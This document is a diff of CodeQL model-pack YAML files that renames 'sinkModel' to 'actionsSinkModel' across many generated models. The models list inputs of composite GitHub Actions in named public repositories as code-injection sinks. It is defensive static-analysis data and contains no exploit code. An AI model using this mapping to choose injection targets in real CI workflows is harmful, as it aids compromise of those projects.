@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da836..5490e62cdc91 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a07514..0c6df201a1c9 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf20..7d0b894f35d8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3bb..d85418c7a41e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e8..074cf066e373 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c46365..c4497b59af8e 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1a..cc28e15a55b0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e5..76fb41dadf10 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019e..b786a672140d 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d47..236ac8f2cd21 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9faf..64207dbca6ab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e83..46de0ff86c67 100644 
--- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b982257211..a07b223777b0 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb113..e3470982f53d 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab904..87535288d265 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1ad..28249c824287 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e9..8d1bbce631fc 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb35..3c5f85a6e79e 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec00..01a552361ecf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e4..ab2e86ce8681 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd6709..8d6dd73bfd91 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a59..a20cbb1e24da 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5e..62785bef86bf 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f6..9c10a54abc71 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f7..4145ec195690 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38d..5b63c9fec069 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebda..f21389b08b02 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc018791..1a6f42c25f66 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737f..ea48b84310cb 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453bd..4e953d695f82 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc6007..32040ef84eac 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1a..b258ea1ce2da 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53c..c0a51345ae6f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04d..f362cd1f72b7 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6dd..35474e6c68f9 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b340..ce961ee6a75b 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c3312262..9ad4bb306662 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c10..5fca46427e00 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d2..9f0fecbe10b9 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a013..cadf01dbff1e 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df670..ec4fc1da053c 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd1158..e6530a19d972 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97af..0bae4e91cde0 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a40..0acb53ba1d3a 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368e..f1b755e796b5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039b..7d1733d647ac 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e83761..4bf33c9a343d 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff306..9ca004a7c155 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", 